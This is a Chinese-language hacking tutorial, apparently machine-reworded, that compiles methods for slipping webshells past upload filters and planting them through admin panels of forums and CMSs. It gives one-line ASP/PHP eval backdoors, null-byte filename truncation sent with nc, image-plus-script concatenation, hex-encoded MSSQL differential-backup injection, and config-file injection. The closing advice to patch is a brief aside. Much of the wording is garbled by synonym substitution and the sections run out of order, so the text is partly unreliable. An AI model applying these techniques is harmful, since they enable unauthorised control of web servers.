几种上传图片shell绕过过滤的方法加后台拿shell的一些技巧总结

1、文件头+GIF89a法。（php）//这个极好了解，直接在php马最前面写入gif89a，然后上载dama.php

 

2、运用edjpgcom东西向图像写入代码。（php）//edjpgcom修正，参加php一句话保存为dama.php

 

3、cmd指令下copy 图像.GIF+shell.php webshell.php （php） //估量和1是相同的原理，诈骗上载webshell.php

 

4、C32asm翻开图像在文件末尾空一格参加代码 。（php）//填充php一句话然后上载。

 

5、在4基础上改善代码")?> 。(php)//同

目录下生成error.php，发问：asp的怎样改写？

答复：asp测验的结果是：没有权限...

<%  Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject")  Set MyTextFile=MyFileObject.CreateTextFile("kafei.asp")  MyTextFile.WriteLine("/</%eval request(chr(35))/%/>")  MyTextFile.Close  %>

 

6、IIS解析目录名缝隙1.php;.jpg (jpg) //这是文件名变量没有过滤。

 

7、nc抓包改数据 //途径名和文件名没有过滤。

//经过抓包修正上载途径经过/upload/1.asp+空格，运用软件把空格填充为00。然后nc提交获取webshell。

.


1、所以本地建了一个MDB数据库，写入
┼攠數畣整爠煥敵瑳∨≡┩愾
2、然后改为ASP上载，一句话木马上载成功了，再拿客户端去连的时分，出来了一流监控体系的提示
估量前面的SHELL为空也是这东西搞的。。
所以先将自个的SHELL用微软的screnc.exe进行加密。
3、然后新建一个很小的图像。
在CMD下面copy /b a.jpg+shell.asp rs.asp
运用二进制的办法将两个文件兼并在一起。 这次再上载，成功了，没有被那个监控体系挡下来。
4、可是这时的SHELL要在FIREFOX下面才能够浏览，放到IE下面的话只会的到一张图像，而看不到SHELL 。
因为前面将SHELL与图像兼并在一起了，所以这时的SHELL里边有许多乱码，这时运用SHELL的长途文件下载功用。
因为一流监控体系只会对向上载的数据进行检查，对服务器下载的数据并不会进行检查。
将一个洁净的SHELL下载到服务器上就行，先将SHELL存为TXT文件然后传到自个的服务器上，然后再运用SHELL供给的长途文件下载功用将那个TXT文件下载到服务器上面存为ASP，这么就拿到了一个洁净的SHELL。

================================================

上载缝隙首要即是运用'/0'字符缝隙，'/0'字符在体系中被用作字符串完毕的象征
基本原理即是网络程序尽管制止了.asp等后缀名文件的上载，可是都会答应.jpg或许.gif格式文件的上载。
这么假如自个结构数据包 formPath=UploadFile/shell.asp'/0 '.jpg，那么'/0 '后边的字符将被切断，原因是计算机遇到'/0'字符，以为字符串完毕了。所以咱们就向服务器上载了一个名为shell.asp的ASP木马程序，后边的就不多说了，webshell的功用现已很强壮了，假如再合作Serv-U取得server的管理员权限...

 


侵略进程：
条件：需求最少NC、WinSock Expert、UltraEdit三个东西和一个webshell程序
nc.exe(netcat) - 一个变形了的telnet，嗅探器，网络安全届的军刀！
WinSock Expert - 抓包东西，能够截获网络通讯的数据流
UltraEdit - ......不说了，无人不知无人不晓-_-!
webshell - ASP、PHP等木马程序

 


1.第一步，翻开方针体系的上载页面，经过WinSock Expert监督，上载webshell.asp文件，再翻开WinSock Expert，将截获的数据流存为文这篇文章件
（两个send下面的一切内容，包含回车产生的空白行）

 


2.经过UltraEdit修正文这篇文章件中的要害代码：filename="C:/test/webshell.asp" ，webshell.asp后加：1个空格及.jpg，然后跳到16进制修正状况，修正16进制下空格的20为00，Content-Length长度增加5。（一个字符算一个字节，' .jpg'一个5个字节）

 


3.nc进场~！^^
指令：nc -vv www.xxx.com 80 < 1.txt

后台拿web shell全集

一、直接上载取得webshell 
这种对php和jsp的一些程序对比多见，MolyX BOARD即是其间一例，直接在心境图标管理上载.php类型，尽管没有提示，本来现已成功了，上载的文件url应该是http://forums/images/smiles/下，前一阵子的联众游戏站和网易的jsp体系缝隙就能够直接上载jsp文件。文件名是原来的文件名，bo-blog后台能够能够直接上载.php文件，上载的文件途径有提示。以及一年前非常盛行的upfile.asp缝隙(动网5.0和6.0、前期的许多整站体系)，因过滤上载文件不严，致运用户能够直接上载webshell到网站恣意可写目录中，然后拿到网站的管理员操控权限。 
二、增加修正上载类型 
如今许多的脚本程序上载模块不是只答应上载合法文件类型，而大多数的体系是答应增加上载类型，bbsxp后台能够增加asa　asP类型，ewebeditor的后台也可增加asa类型,经过修正后咱们能够直接上载asa后缀的webshell了,还有一种情况是过滤了.asp，能够增加.aspasp的文件类型来上载取得webshell。php体系的后台，咱们能够增加.php.g1f的上载类型，这是php的一个特性,最终的哪个只需不是已知的文件类型即可，php会将php.g1f作为.php来正常运转,然后也可成功拿到shell。LeadBbs3.14后台取得webshell办法是：在上载类型中增加asp ，留意，asp后边是有个空格的，然后在前台上载ASP马，当然也要在后边加个空格！ 七、asp+mssql体系 
这儿需求提一点动网mssql版，可是能够直接本地提交来备份的。首先在发帖那上载一个写有asp代码的假图像，然跋文住其上载途径。写一个本地提交的表单，代码如下： 
＜form act ion=http://网站/bbs/admin_data.asp?ac tion=RestoreData&act=Restore method="post"＞ 
＜p＞已上载文件的方位：＜input name="Dbpath" type="text" size="80"＞＜/p＞ 
＜p＞要复制到的方位：＜input name="backpath" type="text" size="80"＞＜/p＞ 
＜p＞＜input type="submit" value="提交"＞＜/p＞ ＜/form＞ 
另存为.htm本地履行。把假图像上载途径填在“已上载文件的方位”那里，想要备份的WebShell的相对途径填写在“要复制到的方位”那里，提交就得到咱们心爱的WebShell了，康复代码和此相似，修正有关当地就能够了。没有遇到过后台履行mssql指令对比强壮的asp程序后台，动网的数据库复原和备份是个铺排，不能履行sql指令备份webshell，只能履行一些简单的查询指令。能够运用mssql写入区别备份webshell，通常后台是显现了绝对途径，只需有了写入点基本上就能够区别备份成功。下面是区别备份的首要句子代码，运用动网7.0的写入缝隙能够用区别备份一个webshell，能够用运用上面说到的办法，将conn.asp文件备份成.txt文件而取得库名。 
区别备份的首要代码： 
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s-- 
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])-- 
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)-- 
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT-- 
这段代码中，0x626273是要备份的库名bbs的十六进制，能够是别的名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是＜%execute request("l")%＞的十六进制，是lp最小马；0x643A5C7765625C312E617370是d:/web/1.asp的十六进制,也即是你要备份的webshell途径。当然也能够用对比多见备份办法来取得webshell，仅有的不足即是备份后的文件过大，假如备份数据库中有防下载的的数据表，或许有过错的asp代码，备份出来的webshell就不会成功运转，运用区别备份是成功率对比高的办法，而且极大的削减备份文件的巨细。 
八、php+mysql体系 
后台需求有mysql数据查询功用,咱们就能够运用它履行SELECT ... INTO OUTFILE查询输出php文件，因为一切的数据是存放在mysql里的，所以咱们能够经过正常手法把咱们的webshell代码刺进mysql在运用SELECT ... INTO OUTFILE句子导出shell。 
就能够暴出途径，php环境中对比简单暴出绝对途径：）。提一点的是遇到是mysql在win体系下途径应该这么写。下面的办法是对比常用的一个导出webshell的办法，也能够写个vbs增加体系管理员的脚本导出到发动文件夹，体系重起后就会增加一个管理员帐号 
就会在up目录下生成文件名为saiy.php内容为的最小php木马， 最终用lanker的客户端来衔接。实践运用中要考虑到文件夹是不是有写权限。或许输入这么的代码 将会在当时目录生成一个a.php的最小马。 
九、phpwind论坛从后台到webshell的三种办法 
办法1 模板法 
进入后台， 个性模版设置 ，在随意一行写代码，记住，这代码必须顶着左面行写，代码前面不能够有任何字符。 
方始2 脏话过滤法 
办法3 用户等级管理 
以上三种办法得到webshellr的暗码是a,为lanker的一句话后门服务端。 
十、也能够运用网站拜访计数体系记录来取得webshell 
解决方案 
因为这篇文章涉及的代码版本许多，所以不可能供给一个完美的解决方案。有能力者能够对于这篇文章说到的缝隙文件进行恰当修补，若缝隙文件不影响体系运用也可删去此文件。咱们假如不会修补，能够到有关官方网站下载最新补丁进行修复更新。一起也请咱们能时间重视各大安全网络发布的最新布告，若自个发现有关缝隙也可及时告诉官方网站。 
跋文 
本来，从后台得到webshell的窍门应该还有许多的，要害是要看咱们怎样灵活运用、举一反三，期望这篇文章的办法能起到抛砖引玉的效果。 各位加油吧，让咱们将服务器操控到底！ 
三、运用后台管理功用写入webshell 
上载缝隙基本上补的也差不多了,所以咱们进入后台后还能够经过修正有关文件来写入webshell。对比的典型的有dvbbs6.0，还有leadbbs2.88等，直接在后台修正配置文件，写入后缀是asp的文件。而LeadBbs3.14后台取得webshell另一办法是：增加一个新的友谊链接，在网站称号处写上冰狐最小马即可,最小马前后要随意输入一些字 
，http://网站/inc/IncHtm/BoardLink.asp即是咱们想要的shell。 
四、运用后台管理向配置文件写webshell 
运用"""":""//"等符号结构最小马写入程序的配置文件，joekoe论坛，某某同学录，欢腾展望新闻体系，COCOON Counter计算程序等等，还有许多php程序都能够，COCOON Counter计算程序举例，在管理邮箱处添上[email protected]":eval request(chr (35))//, 在配制文件中即是webmail="[email protected]/":eval request(chr(35))//"，还有一种办法即是写上 [email protected]"%＞＜%eval request(chr(35))%＞＜%’，这么就会构成前后对应，最小马也就运转了。＜%eval request(chr(35))%＞能够用lake2的eval发送端以及最新的2006 客户端来连，需求阐明的是数据库插马时分要选前者。再如动易2005，到文章基地管理-顶部菜单设置-菜单其它特效，刺进一句话马"%＞＜%execute request("l")%＞＜%’，保 存顶部节目菜单参数设置成功后，咱们就得到马地址http://网站/admin/rootclass_menu_config.asp。 
五、运用后台数据库备份及康复取得webshell 
首要是运用后台对access数据库的“备份数据库”或“康复数据库”功用，“备份的数据库途径”等变量没有过滤致使能够把恣意文件后缀改 为asp，然后得到webshell，msssql版的程序就直接应用了access版的代码，致使sql版照样能够运用。还能够备份网站asp文件为别的后缀 如.txt文件，然后能够检查并取得页面源代码，并取得更多的程序信息增加取得webshell的时机。在实践运用中经常会碰到没有上载功用的时 候，可是有asp体系在运转，运用此办法来检查源代码来取得其数据库的方位，为数据库插马来发明时机，动网论坛就有一个ip地址的数据库，在后台的ip管理中能够刺进最小马然后备份成.asp文件即可。在谈谈打破上载检查的办法，许多asp程序在即便改了后缀名后也会提示文件不合法，经过在.asp文件头加上gif89a修正后缀为gif来骗过asp程序检查到达上载的意图，还有一种即是用记事本翻开图像文件，随意张贴一部分复制到asp木马文件头，修正gif后缀后上载也能够打破检查，然后备份为.asp文件，成功得到webshell。 
六、运用数据库紧缩功用 
能够将数据的防下载失效然后使刺进数据库的最小马成功运转，对比典型的即是loveyuki的L-BLOG，在友谊增加的url出写上＜%eval request (chr(35))%＞, 提交后，在数据库操作中紧缩数据库，能够成功紧缩出.asp文件，用海洋的最小马的eval客户端连就得到一个webshell。